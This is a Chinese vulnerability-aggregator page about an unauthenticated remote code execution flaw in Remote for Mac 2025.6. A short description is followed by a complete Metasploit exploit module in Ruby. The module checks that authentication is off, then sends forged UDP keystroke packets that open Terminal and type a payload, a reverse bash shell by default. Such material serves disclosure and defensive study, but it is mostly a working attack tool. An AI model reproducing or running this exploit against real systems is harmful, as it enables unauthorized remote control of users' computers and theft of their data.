Remote for Mac 20256 Unauthenticated UDP Keyboard RCE

漏洞信息

漏洞名称: Remote for Mac 2025.6 Unauthenticated UDP Keyboard RCE

漏洞类型: 命令执行

漏洞等级: 高危

漏洞描述: 受影响的产品是Remote for Mac 2025.6,这是一款允许用户远程控制Mac电脑的应用程序。它通常用于远程办公或技术支持场景,用户可以通过它模拟键盘和鼠标输入,实现对远程Mac的控制。该应用程序在企业环境和个人用户中都有一定的使用率。

漏洞解释:该漏洞属于未授权远程命令执行类型。其技术根源在于应用程序在’Allow unknown devices’设置启用时,未能正确验证UDP数据包的来源,导致攻击者可以通过发送特制的UDP数据包模拟键盘输入,无需任何认证即可在目标系统上执行任意命令。这种漏洞的存在通常是由于开发过程中对输入验证和认证机制的疏忽。

影响分析:此漏洞的安全风险极高,攻击者可以利用此漏洞在目标系统上执行任意命令,可能导致完全控制系统、数据泄露或服务中断。由于漏洞利用不需要认证,且可以通过网络远程触发,因此攻击者可以大规模自动化利用此漏洞。此外,由于攻击模拟的是键盘输入,可能会在目标系统上产生可见的效果,如打开终端窗口,这虽然增加了攻击被发现的几率,但也可能导致用户误操作或数据丢失。

产品名称: Remote for Mac

影响版本: 2025.6

来源: https://github.com/rapid7/metasploit-framework/blob/82c27249de137e90a5c4715564aae8940f55d81f/modules%2Fexploits%2Fosx%2Fmisc%2Fremote_for_mac_udp_rce.rb

类型: rapid7/metasploit-framework:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149

require 'json'
require 'socket'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Remote for Mac 2025.6 Unauthenticated UDP Keyboard RCE',
        'Description' => %q{
          This module exploits an unauthenticated remote code execution vulnerability in Remote for Mac 2025.6.
          When the "Allow unknown devices" setting is enabled, it is possible to simulate keyboard input via UDP packets
          without authentication. By sending a sequence of key presses, an attacker can open the Terminal and execute
          arbitrary shell commands, achieving code execution as the current user.

          Tested on macOS Mojave and Ventura.
        },
        'Author' => ['Chokri Hammedi'],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'https://packetstorm.news/files/id/196351/']
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]
        },
        'Platform' => ['unix','osx'],
        'Arch' => ARCH_CMD,
        'Targets' => [['Remote for Mac 2025.6', {}]],
        'DefaultTarget' => 0,
        'DefaultPayload' => 'cmd/unix/reverse_bash',
        'DisclosureDate' => '2025-05-27'
      )
    )

    register_options(
      [
        Opt::RHOSTS(),
        Opt::RPORT(49229),
        OptBool.new('SSL', [true, 'Use SSL for HTTP check', true]),
        OptString.new('TARGETURI', [true, 'Base URI path', '/']),
      ]
    )
  end

  def check_auth_disabled?
    protocol = datastore['SSL'] ? 'https' : 'http'
    vprint_status("Checking authentication on #{protocol}://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}api/getVersion")

    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(datastore['TARGETURI'], 'api', 'getVersion'),
        'ctype' => 'application/json',
        'ssl' => datastore['SSL'],
        'rport' => datastore['RPORT'],
        'rhost' => datastore['RHOSTS']
      })

      if res&.code == 200
        json = JSON.parse(res.body)
        if json['requires.auth'] == false
          print_good('Authentication is disabled. Target is vulnerable.')
          return true
        else
          print_error('Authentication is enabled. Exploit aborted.')
          return false
        end
      else
        print_error('Unexpected response from target')
        return false
      end
    rescue ::Rex::ConnectionError, JSON::ParserError => e
      print_error("Connection or parsing error: #{e.message}")
      return false
    end
  end

  def exploit
    unless check_auth_disabled?
      fail_with(Failure::NotVulnerable, 'Target requires authentication or is unreachable')
    end

    udp_port = datastore['RPORT']
    target_ip = datastore['RHOSTS']

    initial_packets_hex = [
      '07000200370001',
      '07000200370001',
      '060003002000',
      '07000200370000',
      '07000200370000'
    ]

    final_packets_hex = [
      '07000200240001',
      '07000200240000'
    ]

    udp_sock = UDPSocket.new
    udp_sock.connect(target_ip, udp_port)

    print_status('Simulating system keyboard input to open Terminal...')
    initial_packets_hex.each do |hexpkt|
      udp_sock.send([hexpkt].pack('H*'), 0)
      select(nil, nil, nil, 0.05)
    end

    prefix = [0x06, 0x00, 0x03, 0x00].pack('C*')
    'terminal'.each_char do |ch|
      pkt = prefix + ch.encode('utf-16le').force_encoding('ASCII-8BIT')
      udp_sock.send(pkt, 0)
      select(nil, nil, nil, 0.1)
    end

    final_packets_hex.each do |hexpkt|
      udp_sock.send([hexpkt].pack('H*'), 0)
      select(nil, nil, nil, 0.1)
    end

    sleep(2)

    shell_cmd = payload.encoded
    print_status('Sending malicious payload to be executed...')

    shell_cmd.each_char do |ch|
      pkt = prefix + ch.encode('utf-16le').force_encoding('ASCII-8BIT')
      udp_sock.send(pkt, 0)
      select(nil, nil, nil, 0.1)
    end

    final_packets_hex.each do |hexpkt|
      udp_sock.send([hexpkt].pack('H*'), 0)
      select(nil, nil, nil, 0.1)
    end

    print_good('Payload sent. Awaiting session...')
  ensure
    udp_sock.close if udp_sock
  end
end


Github Poc
#rapid7/metasploit-framework:github issues #命令执行
Remote for Mac 20256 Unauthenticated UDP Keyboard RCE
http://example.com/2025/07/28/github_1368636133/
作者
lianccc
发布于
2025年7月28日
许可协议